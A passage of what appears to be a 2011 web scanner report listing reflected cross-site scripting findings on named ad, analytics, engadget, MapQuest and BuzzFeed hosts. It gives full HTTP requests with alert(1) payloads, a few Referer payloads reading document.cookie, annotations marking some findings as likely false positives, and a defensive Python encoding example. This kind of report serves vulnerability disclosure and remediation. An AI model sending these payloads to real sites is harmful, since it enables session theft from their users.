The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bcd"><script>alert(1)</script>adc7d40215f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size30bcd"><script>alert(1)</script>adc7d40215f=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
1.59. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://at.atwola.com
Path: /adiframe/3.0/5113.1/221794/0/-1/size=300x250
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9149d"><script>alert(1)</script>622ffc05fe8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?9149d"><script>alert(1)</script>622ffc05fe8=1 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 232
The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c98c6"><script>alert(1)</script>3c3af206613 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305907;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93305907;target=_blank;aduho=-360;grp=24244844;misc=24244844c98c6"><script>alert(1)</script>3c3af206613 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of the c1 request parameter is copied into the response body. The payload 3e4b0<script>alert(1)</script>3fe39883e3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
Note the response headers: the body is served as application/x-javascript, not text/html. A browser that opens this URL directly does not parse it as an HTML document, so the <script> tag in the payload does not execute, and the scanner's generic wording ("copied into the HTML document as plain text between tags") does not fit this resource. The reflection is still a defect in a script that third-party pages load, but it becomes exploitable only where an embedding page lets an attacker control these parameters and the reflected text lands in an executable position in the script, which this report does not establish. The same caveat applies to the c10, c15, c2, c3, c4, c5 and c6 findings below.
This proof of concept shows that the input is reflected without encoding; on its own it does not demonstrate JavaScript execution.
Request
GET /beacon.js?c1=83e4b0<script>alert(1)</script>3fe39883e3&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:36:59 GMT Date: Sun, 06 Feb 2011 20:36:59 GMT Connection: close Content-Length: 3608
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 3ded5<script>alert(1)</script>e6bec28e3dd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=3ded5<script>alert(1)</script>e6bec28e3dd&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:01 GMT Date: Sun, 06 Feb 2011 20:37:01 GMT Connection: close Content-Length: 3609
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 60671<script>alert(1)</script>5eb3a0cba51 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15=60671<script>alert(1)</script>5eb3a0cba51 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:02 GMT Date: Sun, 06 Feb 2011 20:37:02 GMT Connection: close Content-Length: 3609
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload d53a2<script>alert(1)</script>9cc82d916a8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693d53a2<script>alert(1)</script>9cc82d916a8&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:00 GMT Date: Sun, 06 Feb 2011 20:37:00 GMT Connection: close Content-Length: 3609
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 68b81<script>alert(1)</script>efcbb2330ca was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=168b81<script>alert(1)</script>efcbb2330ca&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:00 GMT Date: Sun, 06 Feb 2011 20:37:00 GMT Connection: close Content-Length: 3609
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 19807<script>alert(1)</script>acb3208d838 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F19807<script>alert(1)</script>acb3208d838&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:00 GMT Date: Sun, 06 Feb 2011 20:37:00 GMT Connection: close Content-Length: 3609
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7f924<script>alert(1)</script>327a9db5a54 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=7f924<script>alert(1)</script>327a9db5a54&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:01 GMT Date: Sun, 06 Feb 2011 20:37:01 GMT Connection: close Content-Length: 3609
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 3ca5d<script>alert(1)</script>9482817c403 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=3ca5d<script>alert(1)</script>9482817c403&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:01 GMT Date: Sun, 06 Feb 2011 20:37:01 GMT Connection: close Content-Length: 3609
1.69. http://chinese.engadget.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://chinese.engadget.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cbb5"-alert(1)-"5dc800f9cb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2cbb5"-alert(1)-"5dc800f9cb0=1 HTTP/1.1 Host: chinese.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)docume ...[SNIP]...
1.70. http://cn.engadget.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cn.engadget.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8582e"-alert(1)-"5a7ac817e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8582e"-alert(1)-"5a7ac817e08=1 HTTP/1.1 Host: cn.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
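The two engadget findings reflect a parameter name into a double-quoted JavaScript string, where `"-alert(1)-"` needs no HTML tags at all: the quote ends the string and the rest is evaluated as code. When the data cannot be kept out of the script block, the safe form is a JSON-encoded literal with `<`, `>` and `&` additionally escaped so that the HTML parser can never see a `</script>`. The block below is an added example, not the engadget.com code: the `s_pageName` snippet is a constructed stand-in for a tracking script, and `assigned_string` uses `json.loads` as a stand-in for a JavaScript engine (JSON string syntax is a subset of JS string-literal syntax), returning `None` when the payload has turned into code rather than data. The same rule covers JSONP callback names, which are script context too; `safe_callback` is the allow-list a JSONP endpoint should apply.

```python
import json
import re
from typing import Optional

# Payload from the report: breaks out of a double-quoted JS string.
PAYLOAD = '2cbb5"-alert(1)-"5dc800f9cb0'

_JS_EXTRA_ESCAPES = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def to_js_literal(value) -> str:
    """JSON-encode a value for an inline <script>. json.dumps escapes quotes,
    backslashes, control characters and (with ensure_ascii) U+2028/U+2029; the
    extra pass neutralises '</script>' and '<!--' so the HTML tokenizer cannot
    end the script block early."""
    out = json.dumps(value)
    for ch, esc in _JS_EXTRA_ESCAPES.items():
        out = out.replace(ch, esc)
    return out


def render_vulnerable(page_name: str) -> str:
    """Constructed tracking snippet (hypothetical, not the engadget.com code):
    the query-string value lands inside a JS string with no encoding."""
    return f'<script>var s_pageName="{page_name}";</script>'


def render_safe(page_name: str) -> str:
    """Same snippet emitting a proper literal instead of raw text."""
    return f'<script>var s_pageName={to_js_literal(page_name)};</script>'


_ASSIGN = re.compile(r'<script>var s_pageName=(.*);</script>$', re.S)


def assigned_string(document: str) -> Optional[str]:
    """Return the value s_pageName receives if the right-hand side is exactly one
    string literal; None means the input changed the code itself."""
    m = _ASSIGN.match(document)
    if not m:
        return None
    try:
        value = json.loads(m.group(1))
    except ValueError:          # JSONDecodeError is a ValueError
        return None
    return value if isinstance(value, str) else None


# JSONP callback names are script context as well: accept only a dotted
# identifier path and reject everything else before it reaches the response.
_CALLBACK = re.compile(r'^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$')


def safe_callback(name: str) -> Optional[str]:
    return name if _CALLBACK.match(name) else None


if __name__ == "__main__":
    print("vulnerable ->", assigned_string(render_vulnerable(PAYLOAD)))
    print("safe       ->", assigned_string(render_safe(PAYLOAD)))
    print("callback   ->", safe_callback("MQA._covCallback"), safe_callback("alert(1);//"))
```

Encoding is the second-best answer; the remediation note above is right that the first choice is to keep user data out of script blocks altogether, for example by placing it in a `data-` attribute (HTML-attribute-encoded) and reading it from `dataset` in a static script, which also keeps a strict Content-Security-Policy workable.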
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d259<script>alert(1)</script>3ed25b9c15a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
The reflection is in the server's 404 error page, which is served as text/html with the requested path echoed without encoding (see the response body below), so it is not tied to the /coverage handler: any request path that does not exist is likely to be reflected the same way.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage8d259<script>alert(1)</script>3ed25b9c15a?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Referer: http://www.mapquest.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:49:51 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2 Connection: close Content-Type: text/html Content-Length: 247
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /coverage8d259<script>alert(1)</script>3ed25b9c15a was not found on this server.</p> ...[SNIP]...
The value of the cat request parameter is copied into the response body. The payload 70953<script>alert(1)</script>a0406af2794 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
The response, however, is a 400 Bad Request served as text/plain (46 bytes). Modern browsers do not render a text/plain body as HTML (older Internet Explorer versions did sniff text/plain, which is what the X-Content-Type-Options: nosniff header was introduced to stop), so this reflection does not execute script. Record it as a false positive for reflected XSS unless a different request shape makes the same value appear in an HTML or script response.
Request
GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat70953<script>alert(1)</script>a0406af2794 HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Referer: http://www.mapquest.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 BAD REQUEST
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3e48a<script>alert(1)</script>1db30dff717 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage?format=json&jsonp=MQA._covCallback3e48a<script>alert(1)</script>1db30dff717&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1129
1.74. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://coverage.mqcdn.com
Path:
/coverage
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 77427<script>alert(1)</script>26ea7b496e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat&77427<script>alert(1)</script>26ea7b496e3=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1091
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a95f9<script>alert(1)</script>13b395b7000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoa95f9<script>alert(1)</script>13b395b7000 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:14:35 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 250

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.icoa95f9<script>alert(1)</script>13b395b7000 was not found on this server.</p>
...[SNIP]...
The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 2d744<script>alert(1)</script>660425639af was submitted in the or parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wd/UserWidget?u=popeater&to=1&or=vb2d744<script>alert(1)</script>660425639af&wid=1&cb=1297025740300 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:54:55 GMT
Server: lighttpd bf1
Content-Length: 577

bless({ "-file" => "lib/buzzfeed/wd/controller/UserWidget.pm", "-line" => 130, "-package" => "buzzfeed::wd::controller::UserWidget", "-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script>alert(1)</script>660425639af&wid=1&to=1&u=popeater - Internal Server Error", }, "Error::Simple")
unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script> ...[SNIP]...
The value of the u request parameter is copied into the HTML document as plain text between tags. The payload c17bd<script>alert(1)</script>ad8b15919de was submitted in the u parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wd/UserWidget?u=popeaterc17bd<script>alert(1)</script>ad8b15919de&to=1&or=vb&wid=1&cb=1297025740300 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:54:54 GMT
Server: lighttpd bf2
Content-Length: 577

bless({ "-file" => "lib/buzzfeed/wd/controller/UserWidget.pm", "-line" => 130, "-package" => "buzzfeed::wd::controller::UserWidget", "-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script>alert(1)</script>ad8b15919de - Internal Server Error", }, "Error::Simple")
